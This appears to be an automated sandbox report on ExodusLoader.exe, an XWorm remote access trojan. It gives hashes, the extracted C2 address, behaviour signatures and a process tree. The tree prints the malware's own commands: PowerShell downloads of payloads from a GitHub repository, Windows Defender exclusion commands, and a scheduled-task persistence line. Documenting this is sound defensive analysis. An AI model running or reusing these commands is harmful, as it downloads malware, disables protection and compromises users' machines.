Overview

overview

10

Static

static

3

ExodusLoader.exe

windows7-x64

8

ExodusLoader.exe

windows10-2004-x64

Analysis

  • max time kernel
    54s
  • max time network
    56s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 22:20

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    ExodusLoader.exe

  • Size

    89KB

  • MD5

    2f3405fa61bec944ed9d869adb6a37e3

  • SHA1

    4a3c839b899809ba89a99eaadecf4da6d71e8256

  • SHA256

    ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234

  • SHA512

    72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0

  • SSDEEP

    1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    System.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4392
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C12E.tmp\C12F.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4768
      • C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
        "C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4304
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2756
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1092
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF0C8.tmp.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4408
          • C:\Windows\system32\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:1468
      • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
        "C:\Users\Admin\AppData\Local\Temp\Exodus.exe"
        3⤵
        • Executes dropped EXE
        PID:1332
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5104
  • C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
    C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3092
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2724
    • C:\Windows\system32\shutdown.exe
      shutdown.exe /f /s /t 0
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1820
  • C:\ProgramData\System.exe
    C:\ProgramData\System.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1284
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa392b055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:2848

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    612b19feac3b60bdc771ec888769ea75

    SHA1

    cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

    SHA256

    3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

    SHA512

    2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    c8e7313b7a3520e07660e8eeef3a4fb2

    SHA1

    8292509f1507be8a9b1b4f74d06c3bb2265b8fe6

    SHA256

    ed4cf88c79cacd3b75a226b4ec34db47c972288b1f6902a32ec8efa2e9b33cb9

    SHA512

    b611f6b91eaab91e5a58b187edc1ec3e960e5123df72d7bbe1433715ba67f458a2c23ac88eeed9130e841047c979e62544aafa4255878173362ee840dbf70c2f

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    8e4e462e64126355db69af06ba8f774e

    SHA1

    279d1d08ad530bf8a249366c5d927e1533f77f1a

    SHA256

    c263a08e8768e9038dc462db8782f66ce94230ce8a372d7320e8eb7f862a3f76

    SHA512

    92bd1d207d3f9d139e949e47f70d69ef1be8d40c11b03fd2bebb22bfeb598b6065921a1f3ec931e8a4d4dfdb8974a8405f17a1b3f54e4fc549fd8ea1dd5fb353

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C12E.tmp\C12F.bat
    Filesize

    491B

    MD5

    54436d8e8995d677f8732385734718bc

    SHA1

    246137700bee34238352177b56fa1c0f674a6d0b

    SHA256

    20c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3

    SHA512

    57ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
    Filesize

    507KB

    MD5

    470ccdab5d7da8aafc11490e4c71e612

    SHA1

    bc540c0ba7dcb0405a7b6c775f0a1b585d51c4b3

    SHA256

    849c0420722c1dabb927ff0ab70375bc1197ba73a7f04885460b609392bd319c

    SHA512

    6b3a09b785c02a57f6330cd6610f8a78b1f6a1689c14a190a9af4ad4ab4666f8a77d75c4c85a3af04693effdc970440ce8d62a4132f66471aaa250f9d90f2f7b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
    Filesize

    227KB

    MD5

    38b7704d2b199559ada166401f1d51c1

    SHA1

    3376eec35cd4616ba8127b976a8667e7a0aac87d

    SHA256

    153825af8babb75361f4af359bfdd5e95cbdc7f263db5c4e70ac1da8f36bc564

    SHA512

    07b828073c8f80c5498501c8f64decb5effa702c8bc3d60a2f7d5de36d493b469cbbf413fb0c92c0aadd6ee139bfb75f3b9e936230212d42e57d2ec5671e9b27

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuxsozni.wgq.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpF0C8.tmp.bat
    Filesize

    164B

    MD5

    9db85a9f714e9e134b399357f11899a1

    SHA1

    a1545d848656fb026c49e1a914a3493aca83297d

    SHA256

    82b1f3cc86c33e05b809dbb774aa0c0550a3687dc7d8c06ff49ca9d29be85522

    SHA512

    0a59707dc910d641cdc1de4d9b73e48f780d6f18e6705396412839e3fbe4cf672f11d546a177de2b1cafe0a72459e34611f552f87bdda9bda44c87576ae7335a

    Download Submit

  • memory/3092-77-0x000000001CAC0000-0x000000001CACC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/3092-72-0x0000000002A60000-0x0000000002A6E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3980-18-0x00007FFFBED30000-0x00007FFFBF7F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3980-14-0x00007FFFBED30000-0x00007FFFBF7F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3980-13-0x00007FFFBED30000-0x00007FFFBF7F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3980-12-0x000001EEBB670000-0x000001EEBB692000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3980-2-0x00007FFFBED33000-0x00007FFFBED35000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4304-41-0x00000000002C0000-0x0000000000300000-memory.dmp

    Filesize

    256KB

    Download

  • memory/4768-35-0x00007FFFBED30000-0x00007FFFBF7F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4768-32-0x00007FFFBED30000-0x00007FFFBF7F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4768-31-0x00007FFFBED30000-0x00007FFFBF7F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4768-20-0x00007FFFBED30000-0x00007FFFBF7F1000-memory.dmp

    Filesize

    10.8MB

    Download